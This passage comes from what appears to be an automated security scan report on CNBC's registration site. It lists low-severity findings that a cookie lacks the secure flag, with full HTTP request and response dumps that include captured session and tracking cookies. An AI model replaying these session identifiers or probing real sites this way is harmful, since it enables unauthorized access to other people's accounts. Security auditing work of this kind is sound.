Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:46 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 231
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>Email Address is required</description>
<timestamp>Tue Sep 06 11:05:46 EDT 2011</timestamp
...[SNIP]...

7.40. https://register.cnbc.com/checkpassword.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /checkpassword.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkpassword.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:46 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 226
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>Password is required</description>
<timestamp>Tue Sep 06 11:05:46 EDT 2011</timestamp>

...[SNIP]...

7.41. https://register.cnbc.com/checkscreenname.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /checkscreenname.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkscreenname.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 227
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>User name is required</description>
<timestamp>Tue Sep 06 11:05:47 EDT 2011</timestamp>

...[SNIP]...

7.42. https://register.cnbc.com/checkzipcode.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /checkzipcode.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkzipcode.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 226
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>Zip Code is required</description>
<timestamp>Tue Sep 06 11:05:47 EDT 2011</timestamp>

...[SNIP]...

7.43. https://register.cnbc.com/createUser.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /createUser.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /createUser.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:45 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:45 GMT; path=/
Content-Length: 54215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...

7.44. https://register.cnbc.com/css/forgotPassword.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /css/forgotPassword.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/forgotPassword.css HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Mon, 01 Jun 2009 14:04:23 GMT
ETag: "415-46b49e73a87c0"
Accept-Ranges: bytes
Content-Length: 1045
Connection: close
Content-Type: text/css
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

div{}
.headerImage{margin-top:5px}
.mainContent{width:970px;padding:0px;}
.mainContent .heading{font-family:Arial;font-size:16;font-weight:bold;color:#2D648A;margin-bottom:20px;margin-top:40px;margin-
...[SNIP]...

7.45. https://register.cnbc.com/css/member_center_sytles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /css/member_center_sytles.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/member_center_sytles.css HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT
ETag: "135b-49fc8d80f4e80"
Accept-Ranges: bytes
Content-Length: 4955
Connection: close
Content-Type: text/css
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

/* CSS Document */
.cnbc_member_center_backbg{
   background-image:url(../images/registration-04.jpg);
   background-repeat:repeat;
   
}

.cnbc_member_center_headerbg{
   background-image:url(../images/membe
...[SNIP]...

7.46. https://register.cnbc.com/css/newRegistration.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /css/newRegistration.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/newRegistration.css HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 20 Jan 2010 20:57:31 GMT
ETag: "1778-47d9ed5bbc4c0"
Accept-Ranges: bytes
Content-Length: 6008
Connection: close
Content-Type: text/css
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

body{background-color:#FFFFFF;margin:0px; padding:0px}
div{}
/*
border:1px solid
*/

.mainContent{width:635px;padding:0px;}

.headerMessage{font-family:Arial;font-size:17;font-weight:bold;color:#4248
...[SNIP]...

7.47. https://register.cnbc.com/css/registration.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /css/registration.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/registration.css HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT
ETag: "2a54-49fc8d80f4e80"
Accept-Ranges: bytes
Content-Length: 10836
Connection: close
Content-Type: text/css
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

.bodyclass {
margin-top: 0px;
background-image:url(../images/tile.gif);
background-repeat:repeat;

}
.regis_copyright {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 11px;
   font-
...[SNIP]...

7.48. https://register.cnbc.com/email/EmailSupport.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /email/EmailSupport.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /email/EmailSupport.jsp HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:43 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/
Content-Length: 91322


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
   <script lang="javascript" src="js/subjects.js"></script>
<title>Contact Customer Service</
...[SNIP]...

7.49. https://register.cnbc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300; s_cc=true; s_nr=1315339311702; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:01:54 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Length: 209
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

7.50. https://register.cnbc.com/forgotPassword1.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /forgotPassword1.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /forgotPassword1.do HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
Content-Length: 45
Cache-Control: max-age=0
Origin: https://register.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300; s_cc=true; s_nr=1315339333234; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/images/clickToContinue.gif%2526ot%253DIMAGE

step=step1&emailAddress=xss%40xss.cx&x=21&y=7

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:14 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:02:14 GMT; path=/
Content-Length: 85679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
   <title>Reset Password</title>
<link href="/css/member_center_sytles.css" rel="stylesheet" typ
...[SNIP]...

7.51. https://register.cnbc.com/forgotpassword1.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /forgotpassword1.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forgotpassword1.jsp HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:01:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://register.cnbc.com/forgotPassword.do
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/


7.52. https://register.cnbc.com/images/clickToContinue.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/clickToContinue.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/clickToContinue.gif HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:50 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Fri, 29 May 2009 14:10:16 GMT
ETag: "4a4-46b0da2bec200"
Accept-Ranges: bytes
Content-Length: 1188
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:50 GMT
Connection: close
Content-Type: image/gif
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

GIF89a~.................................BHXNSbOTcY^l[`nZ_m~..|..............ejvhmypu.ty.............rw..................................................................................................
...[SNIP]...

7.53. https://register.cnbc.com/images/loaderImage.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/loaderImage.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/loaderImage.gif HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "109e-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 4254
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/gif
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

GIF89a.......,*,.........dfd...............DFD...trt..................464.........ljl............TVT...tvt...!..NETSCAPE2.0.....!.......,............$j..Ab.J..I.*U.*..).*..@$.........\N....(.:
H..Cd6
...[SNIP]...

7.54. https://register.cnbc.com/images/memberCenterHeader.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/memberCenterHeader.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/memberCenterHeader.jpg HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:50 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "2a29-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 10793
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:50 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

......JFIF.....H.H.....5Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:02:10 13:45:24.........
...[SNIP]...

7.55. https://register.cnbc.com/images/submitPreferences.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/submitPreferences.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/submitPreferences.jpg HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "334c-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 13132
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:02:10 13:53:01.........
...[SNIP]...

7.56. https://register.cnbc.com/images/tick.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/tick.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/tick.jpg HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
